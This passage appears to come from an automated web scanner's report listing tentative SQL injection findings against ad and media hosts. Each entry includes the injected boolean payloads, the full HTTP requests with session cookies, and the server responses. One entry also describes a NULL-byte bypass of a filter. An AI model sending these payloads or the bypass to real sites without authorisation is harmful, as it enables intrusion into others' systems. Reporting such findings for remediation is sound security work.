Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
1.5. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 2]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://adsatt.abc.starwave.com |
| Path: | /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors'%20and%201%3d1--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors'%20and%201%3d2--%20/Procter_Gamble/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:08 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
1.6. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 3]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://adsatt.abc.starwave.com |
| Path: | /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 19227397'%20or%201%3d1--%20 and 19227397'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d1--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble19227397'%20or%201%3d2--%20/Sep_2011/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:09 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
1.7. http://adsatt.abc.starwave.com/ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif [REST URL parameter 4]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://adsatt.abc.starwave.com |
| Path: | /ad/sponsors/Procter_Gamble/Sep_2011/proc-240x30-0036.gif |
Issue detail
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d1--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 1
HTTP/1.1 404 Not Found
Content-Length: 1635
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: N7ADWEB05
X-Powered-By: ASP.NET
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
</TD></TR></TABLE></BODY></HTML>
Request 2
GET /ad/sponsors/Procter_Gamble/Sep_2011'%20and%201%3d2--%20/proc-240x30-0036.gif?clickTag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clickTAG=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D&clicktag=http%3A//2912a.v.fwmrm.net/ad/l/1%3Fs%3Db035%26t%3D1316221067347346%26adid%3D661886%26reid%3D352172%26arid%3D0%26auid%3D%26cn%3DdefaultClick%26et%3Dc%26_cc%3D%26tpos%3D%26cr%3Dhttp%253A//ad.doubleclick.net/clk%253B245853041%253B70982068%253Bl%253Bpc%253D%255BTPAS_ID%255D HTTP/1.1
Host: adsatt.abc.starwave.com
Proxy-Connection: keep-alive
Referer: http://cdn.media.abc.com/media/_global/player/player1.43.0/flash/SFP_Locke.swf?v1.43.0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response 2
HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
From: n7adweb02
Content-Length: 1245
Date: Sat, 17 Sep 2011 01:05:10 GMT
Connection: close
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/> <title>404 - File or directory not found.</title> <style type="text/css"> <!-- body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;} fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF; background-color:#555555;} #content{margin:0 0 0 2%;position:relative;} .content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} --> </style> </head> <body> <div id="header"><h1>Server Error</h1></div> <div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div> </div> </body> </html>
1.8. http://amch.questionmarket.com/adsc/d775029/8/923517/decide.php [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://amch.questionmarket.com |
| Path: | /adsc/d775029/8/923517/decide.php |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /adsc%00'/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0
Response 1
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Content-Type: text/html
Content-Language: en
Content-Length: 1402
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang=" ...[SNIP]... </a> about the error.
</dd> ...[SNIP]...
Request 2
GET /adsc%00''/d775029/8/923517/decide.php?ord=1316238825 HTTP/1.1
Host: amch.questionmarket.com
Proxy-Connection: keep-alive
Referer: http://omg.yahoo.com/xhr/ad/LREC/2115806991?ref=aHR0cDovL2V2ZXJ5dGhpbmcueWFob28uY29tLw==&token=84d07c78645a8b525d402dd67c88d1cb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CS1=931683-4-1_200215152932-9-1_600001512117-15-1_909940-17-1; ES=921286-wME{M-0_909615-B67|M-0_925807-p'U|M-0_887846-6K'|M-0
Response 2
HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 00:55:26 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /adsc was not found on this server.</p> <hr> <address ...[SNIP]...
1.9. http://cdn.media.abc.go.com/m/images/global/generic/logo.png [REST URL parameter 1]
Summary
| Severity: | High |
| Confidence: | Tentative |
| Host: | http://cdn.media.abc.go.com |
| Path: | /m/images/global/generic/logo.png |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 19952419'%20or%201%3d1--%20 and 19952419'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /m19952419'%20or%201%3d1--%20/images/global/generic/logo.png?v1 HTTP/1.1
Host: cdn.media.abc.go.com
Proxy-Connection: keep-alive
Referer: http://beta.abc.go.com/shows/charlies-angels/bios/eve-french
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWID=3EF1FA6F-091B-486C-85DF-D05197149F77; DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; CRBLM=CBLM-001:; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM_LAST_UPDATE=1316221045:3EF1FA6F-091B-486C-85DF-D05197149F77; __qca=P0-1786187622-1316239132472; s_vi=[CS]v1|2739F83B85010A2F-40000104E00EC2C5[CE]; DETECT=1.0.0&90557&15933611&1&1; tqq=$D$; SEEN2=um8Mie4Oum8Mie4O:; TSC=1; s_pers=%20s_gpv_pn%3Dabccom%253Aprimetime%253Acharlies-angels%253Abios%7C1316240969097%3B; s_sess=%20s_cc%3Dtrue%3B%20s_omni_lid%3Datxt%252Bhttp%253A//cdn.beta.abc.com/service/image/index/id/aa88242c-a3c5-42a3-bcd4-ce165199b8b8/dim/172x96.jpg%255Eabccom%253Aprimetime%253Acharlies-angels%253Abios%3B%20s_sq%3Dwdgabccom%252Cwdgasec%253D%252526pid%25253Dabccom%2525253Aprimetime%2525253Acharlies-angels%2525253Abios%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//beta.abc.go.com/shows/charlies-angels/bios/eve-french%252526ot%25253DA%3B
Response 1
HTTP/1.1 302 Moved Temporarily
Content-Length: 163
Location: http://abc.go.com/error
Server: Microsoft-IIS/6.0
